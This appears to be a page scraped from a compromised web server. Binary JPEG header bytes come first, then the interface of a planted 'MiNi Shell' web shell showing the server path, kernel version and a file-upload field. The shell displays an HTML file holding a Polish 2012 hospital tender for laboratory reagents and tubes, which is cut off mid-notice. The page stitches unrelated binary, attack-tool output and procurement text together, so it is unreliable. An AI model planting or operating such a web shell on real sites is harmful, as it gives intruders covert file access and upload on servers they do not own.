JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/63088-N-2012.html

<p class="kh_header"><b>Szydłowiec: Dostawa odczynników i probówek oraz dzierżawa czytnika do moczu dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu</b><br>
<b>Numer ogłoszenia: 63088 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu , ul. Wschodnia 23, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 6170300, faks 048 6170980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.szydlowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i probówek oraz dzierżawa czytnika do moczu dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników i probówek dla potrzeb Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu zgodnie z załącznikami numer 6, 6a, 6b, 6c, 6d, 6e, 6f, 6g, 6h, oraz dzierżawa czytnika do moczu zał. nr 6i do SIWZ.
PRZEDMIOT ZAMÓWIENIA

Grupa 1
Biochemia - Aparat Konelab 20
1.BILIRUBIN TOT. MET. NBD. 4 x 60 ml	4 op.
2.CALCIUM ARSENAZO III 8 x 20 ml	4 op.
3.TOTAL PROTEIN PLUS 12 x 20 ml	2 op.
4.ENZYLINE ALFA AMYLASE 16 x 5 ml	4 op.
5.CREATYNINE ENZYMATIC 4 x 60 ml	6 op.
6.HDL CHOLESTEROL 4 x 80 ml	4 op.
7.HDL/LDL CALIBRATOR 5 x 1 ml	2 op.
8.GLUCOSE GOD - POD 10 x 60 ml	6 op.
9.CHOLESTEROL LIQ 10 x 60 ml	5 op.
10.WASHFLUID 8 x 20 ml	6 op.
11.TRIGLYCERIDES 12 x 20 ml	10 op.
12.UREA 12 x 20 ml	6 op.
13.URIC ACID (AOX) 8 x 20 ml	4 op.
14.ASAT/GOT (IFCC) 8 x 20 ml	6 op.
15.ALAT/GPR (IFCC) 8 x 20 ml	6 op.
16.ALP (IFCC) 15 x 5 ml	4 op.
17.MAGNESIUM XYLIDUL BLUE 12 x 20 ml	2 op.
18.PHOSPHORUS 12 x 20 ml	2 op.
19.IRON FERENE 10 x 20 ml	4 op.
20.NORTROL CONTROL SERUM 10 x 5 ml	6 op.
21.ABTROL CONTROL SERUM 10 x 5 ml	6 op.
22.s - Cal 10 x 3 ml	4 op.
23.e - Cal 5 x 3 ml	4 op.
24.KONELAB WASHING SOLUT. 4 x 20 ml	4 op.
25.KONELAB ACRYLIC CUVETE (1 op. a 12 tys.)	12 op.
26.KONELAB 20  6M. KIT	4 op.
27.KONELAB 20  12 M. KIT	4 op.
28.NACZYNKA 0,5 ml  1000 szt.	8 op.
29.CRP KONE 2 x 3 ml	3 op.
30.CONTROL N CRP 5 x 1 ml	2 op.
31.CONTROL P CRP 5 x 1 ml	2 op.
32.CK 8 x 3 ml	2 op.
33.GGTP 15 x 5 ml	2 op.
34.Hb A1C a 200 ozn.	2 op.
35.Odczynnik lizujący HbA1C	2 op.
36.CONTROL N     10 x 5 ml	2 op.
37.CONTROL P      10 x 5 ml	2 op.
38.Odczynnik do modułu ISE 4 x 400 ml	4 op.
39.Na - elektrode (do KONELAB 20)	2 szt.
40.K - elektrode (do KONELAB 20)	2 szt.
41.KONELAB 20 ISE 12M. KIT	2 op.

Grupa 2
HEMATOLOGIA ( NA APARAT CELL - DYN 1700)
1.Isotonic Diluent (1 op. a 20 litr)	18 op.
2.Detergent (1 op. a 20 litr)	9 op.
3.Automated Lytic agent -1 op. a 3,8l	3 op.
4.Enzymatic Cleaner Concentrate (2 x 50 ml)	2 op.
5.Krew kontrolna (L, M, H) (6 x 2,5 ml)	3 op.
6.Papier do drukarki Oki Microline 3320	6 op.

Grupa 3
1.Krwinki wzorcowe do wykrywania przeciwciał (3 x 4 ml) 3 - 4 %	24 op.
2.Krwinki wzorcowe do układu ABO (3 x 4 ml) 3 - 4 %	24 op.
3.Surowice anty RhD Standard (5 x 2 ml)	10 op.
4.Surowica antyglobulinowa (5 x 5 ml)	10 op.
5.Papaina (5 x 3ml)	10 op.
6.Odczynniki monoklonalne anty A I seria (5 x 5 ml)             	8 op.
7.Odczynnik monoklonalny anty A II seria (5 x 5 ml)             	8 op.
8.Odczynnik monoklonalny anty B I seria (5 x 5 ml)	8 op.
9.Odczynnik monoklonalny anty B II seria (5 x 5 ml)	8 op.
10.PBS (1 op. a 500 ml)	20 op.
11.Odczynnik LISS ( 1 op. a 100 ml)	15 op.
12.Odczynnik monoklonalny anty D BLEND (5 x 5 ml)	10 op.
13.Odczynnik monoklonalny anty RUM (5 x 5 ml)	10 op.
14.Krwinki do kontroli ujemnych PTA (2 x 2ml)	10 op.

Grupa 4
1.Odczynnik do oznaczania czasu protrombinowego 1 op. - (12 x 4 ml)	30 op.
2.Odczynnik do oznaczania APTT 1 op. - (12 x 2 ml)	8 op.
3.Surowica kontrolna - zakres normalny 1 op. - (10 x 1 ml)	6 op.
4.Surowica kontrolna - zakres patologiczny 1 op. - (10 x 1 ml)	6 op.
5.Kuwety pomiarowe do K - 3002 Optic a 500 szt.	 25 op.

Grupa 5
1.Pakiet do elektrolitów na aparat AVL 9140	24 op.
2.Płyn do czyszczenia aparatu a 125 ml	4 op.
3.Płyn do kondycjonowania aparatu a 125 ml	4 op.
4.Elektroda sodowa	3 szt.
5.Elektroda potasowa	3 szt.
6.Elektroda referencyjna	2 szt.

Grupa 6
1.Test do wykrywania krwi utajonej w kale a 25 testów	8 op.
2.Test na lamblie met Eia ( 1 op. a 96)	5 op.
3.Test na Helicobacter Pylori ( 1 op. a 40)	6 op.
4.ASO latex + kontrole a 100	8 op.
5.Walera Rosego + kontrole a 100	6 op.
6.CPR + kontrole a 100 ozn a 100	10 op.
7.WR + kontrole a 100	4 op.
8.RF + kontrole a 100	6 op.
9.Troponina I a 20 testów	4 op.
10.Testy do wykrywania narkotyków w moczu ( 5 par)	4 op.

Grupa 7
1.Probówki hematologiczne z EDTA a 2 ml (1 op. a 500 szt.)	40 op.
2.Probówki do 0B - 1 op. a 200 szt.	150 szt.
3.Szkiełka nakrywkowe (24 x 24) a 1000 szt.	40 op.
4.Szkiełka podstawowe a 50 szt.	40 op.
5.Probówki wirówkowe z korkiem dł. 65 mm, poj. 7 ml (1 op. a 200 szt.)	50 op.
6.Probówki chemiczne z granulatem a 11ml (1 op. a 200 szt.). Probówki muszą być do szybkiego wykrzepiania i wykonane z przezroczystego tworzywa).	100 op.
7.Probówki do koagulogii 0,2ml z 3,2% cytrynienem sodu a 1,8ml (1 op. a 500 szt.)	20 op.
8.Probówki poj. 4 ml, dł. 75 mm, O 12mm (a 500 szt)	10 op.
9.Probówki serologiczne, okręgłodenne, dł. 100 mm, O 12mm (a 500 szt.)	10 op.
10.Mazaki do pisania po szkle (niebieskie),  (1 op. a 12 szt.)	8 op.
11.Końcówki do pipet automatycznych niebieskie (a 1000 szt.)	20 op.
12.Końcówki do pipet automatycznych (żółte a 200 ml) po 1000 szt.	20 op.
13.Zlewka szklana (wysoka 1000 ml)	10 szt.
14.Płyty serologiczne (do ozn. grup krwi (7)) a 100 szt.)	8 op.
15.Mikrometoda a 200 ml do hemat. a 50 szt.	5 op.
16.Cylinder szklany na podstawce a 50 ml	10 szt.
17.Pipeta automatyczna a 5000 ml ustawna	1 szt.
18.Probówki Ependorfa a 500 ml a 1000 szt.	5 op.
19.Probówki do próżniowego pobierania krwi: hematologia a 100 szt.	10 op.
20.Probówki do próżniowego pobierania krwi: OB. a 100 szt.	10 op.
21.Probówki do próżniowego pobierania krwi: statyw do OB	5 szt.
22.Probówki do próżniowego pobierania krwi: koagulogia a 100 szt.	10 op.
23.Probówki do próżniowego pobierania krwi: biochemia a 100 szt.	20 op.
24.Zestaw (igła i strzykawka) do próżniowego pobierania krwi (1 op. a 100)	50 op.
25.Probówki okrągłodenne ze szkła O 18 mm dł 100 mm poj 12 ml (a 300 szt)	10 op.
26.Igła 8/10 a 100 szt.	10 op.
27.Igła 9/10 a 100 szt.	10 op.
28.Igła motylkowa z wężykiem a 50 szt.	4 op.
29.Uchwyt jednorazowego użytku a 10 szt.	10 op.
Grupa 8
BIOCHEMIA (OZNACZENIA NA APARAT LUMEN)
1.Aspat-60 (5 x 48 + 1 x 60ml)	4 op.
2.ALAT - 60  (5 x 48 + 1 x 60ml)	4 op.
3.ALP 30 ( 1 x 30 ml + 5 x 24 ml)	2 op.
4.Amylase 30 (6 x 30 ml)	2 op.
5.Albumin 60 (6 x 30 ml + 1 x 2 ml)	2 op.
6.Bil - Total 60 (5 x 48 ml + 1 x 60 ml)	5 op.
7.Creatynine-60 (5 x 48 ml + 1 x 60 ml)	6 op.
8.Chol-60 (6 x 60 ml + 1 x 2 ml)	6 op.
9.Calcium-60 (6 x 60 ml + 1 x 60 ml + 1 x 2 ml)	3 op.
10.Ferrum-60 (5 x 48 ml + 1 x 60 ml)	4 op.
11.Glukose-120 (6 x 120 ml)	5 op.
12.Phosfor-30 (6 x 30 ml + 1 x 2 ml)	3 op.
13.Mg-30 (1 x 2 ml + 6 x 30 ml)	3 op.
14.Total - Protein 30 (6 x 30 ml + 1 x 2 ml)	3 op.
15.Urea-60 (5 x 48 ml + 1 x 60 ml)	5 op.
16.UA 60 (5 x 48 ml + 1 x 60 ml)	4 op.
17.HDL - Direct (4 x 30 ml + 4 x 10 ml)	5 op.
18.Surowica N ( 1 op. a 5 szt.)	6 op.
19.Surowica P ( 1 op. a 5 szt.)	6 op.
20.Multicalibrator (1 op. a 5 szt.) 	5 op.
21.Kuwety reakcyjne do aparatu Lumen	7 szt.
22.Naczynka pomiarowe do aparatu Lumen	7 op.
23.Wężyk do Lumena	3 szt.
24.Żarówka do Lumena	3 szt.
25.Igła do Lumena	1 szt.
26.Płyn myjący do aparatu Lumen (6 x 120 ml)	4 op.
27.Wzorzec do Fe	5 szt.
28.Wzorzec do kreatyniny	5 szt.
29.Wzorzec do kwasu moczowego	5 szt.
30.Wzorzec do glukozy	5 szt.
31.Isoton a 20 l Diluent do aparatu Mytic 18	4 op.
32.Lysing Reagent a 1 litr	4 op.
33.Cleaner a 1 litr	4 op.
34.Płyn myjący do Mytic 18	2 op.

Grupa 9
1.Odczynnik May - Grűnwalda 1 op a 1 l	10 op.
2.Odczynnik Giemsy 1 op. 1 l	10 op.
3.Płyn Lugola a 1 l	5 op.
4.Odczynnik Extona do oznaczania białka a 1 l	8 op.
Grupa 10
1.Czytnik do moczu - podać nazwę handlową, model oraz producenta
z:	
2.Podajnik pasków w ruchu ciągłym 	
3.Paski do moczu min 10 parametrów + 1 pole do kwasu askorbinowego	
4.Pojemnik na zużyte paski w aparacie	
5.Zapewnienie od producenta pasków  kontroli jakości         
(Paski i aparat tego samego producenta)	
6.Paski do moczu (10 + 1 pole kwas askorbinowy)  - 600 op.
1 op. a 100 szt.	
7.Paski powinny posiadać certyfikat CE.	
8.Kontrole N - 8 op. - 1 op. a 5 szt.	
9.Kontrole P - 8 op. - 1 op. a 5 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7, 33.19.25.00-7, 33.14.13.20-9, 38.43.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków o których mowa w art. 22 i 24 Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wysokość cen może ulec zmianie w przypadku, gdy w czasie realizacji niniejszej umowy nastąpi zmiana stawek podatkowych VAT lub stawek opłat celnych.
Niedopuszczalne są takie zmiany postanowień zawartej umowy oraz wprowadzenie                do niej nowych postanowień, niekorzystnych dla Kupującego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonania wyboru Sprzedającego, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Kupującego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.szydłowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Inwestycyjno - Gospodarczy i Transportu Medycznego, ul. Kościuszki 170, 26 - 500 Szydłowiec, tel./fax.: (048) 617 - 14 - 31..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Ofertę należy złożyć w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Szydłowcu,ul. Wschodnia 23 w sekretariacie, pok. nr 45..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 1
Biochemia - Aparat Konelab 20
1.BILIRUBIN TOT. MET. NBD. 4 x 60 ml	4 op.
2.CALCIUM ARSENAZO III 8 x 20 ml	4 op.
3.TOTAL PROTEIN PLUS 12 x 20 ml	2 op.
4.ENZYLINE ALFA AMYLASE 16 x 5 ml	4 op.
5.CREATYNINE ENZYMATIC 4 x 60 ml	6 op.
6.HDL CHOLESTEROL 4 x 80 ml	4 op.
7.HDL/LDL CALIBRATOR 5 x 1 ml	2 op.
8.GLUCOSE GOD - POD 10 x 60 ml	6 op.
9.CHOLESTEROL LIQ 10 x 60 ml	5 op.
10.WASHFLUID 8 x 20 ml	6 op.
11.TRIGLYCERIDES 12 x 20 ml	10 op.
12.UREA 12 x 20 ml	6 op.
13.URIC ACID (AOX) 8 x 20 ml	4 op.
14.ASAT/GOT (IFCC) 8 x 20 ml	6 op.
15.ALAT/GPR (IFCC) 8 x 20 ml	6 op.
16.ALP (IFCC) 15 x 5 ml	4 op.
17.MAGNESIUM XYLIDUL BLUE 12 x 20 ml	2 op.
18.PHOSPHORUS 12 x 20 ml	2 op.
19.IRON FERENE 10 x 20 ml	4 op.
20.NORTROL CONTROL SERUM 10 x 5 ml	6 op.
21.ABTROL CONTROL SERUM 10 x 5 ml	6 op.
22.s - Cal 10 x 3 ml	4 op.
23.e - Cal 5 x 3 ml	4 op.
24.KONELAB WASHING SOLUT. 4 x 20 ml	4 op.
25.KONELAB ACRYLIC CUVETE (1 op. a 12 tys.)	12 op.
26.KONELAB 20  6M. KIT	4 op.
27.KONELAB 20  12 M. KIT	4 op.
28.NACZYNKA 0,5 ml  1000 szt.	8 op.
29.CRP KONE 2 x 3 ml	3 op.
30.CONTROL N CRP 5 x 1 ml	2 op.
31.CONTROL P CRP 5 x 1 ml	2 op.
32.CK 8 x 3 ml	2 op.
33.GGTP 15 x 5 ml	2 op.
34.Hb A1C a 200 ozn.	2 op.
35.Odczynnik lizujący HbA1C	2 op.
36.CONTROL N     10 x 5 ml	2 op.
37.CONTROL P      10 x 5 ml	2 op.
38.Odczynnik do modułu ISE 4 x 400 ml	4 op.
39.Na - elektrode (do KONELAB 20)	2 szt.
40.K - elektrode (do KONELAB 20)	2 szt.
41.KONELAB 20 ISE 12M. KIT	2 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HEMATOLOGIA ( NA APARAT CELL - DYN 1700)
1.Isotonic Diluent (1 op. a 20 litr)	18 op.
2.Detergent (1 op. a 20 litr)	9 op.
3.Automated Lytic agent -1 op. a 3,8l	3 op.
4.Enzymatic Cleaner Concentrate (2 x 50 ml)	2 op.
5.Krew kontrolna (L, M, H) (6 x 2,5 ml)	3 op.
6.Papier do drukarki Oki Microline 3320	6 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 3
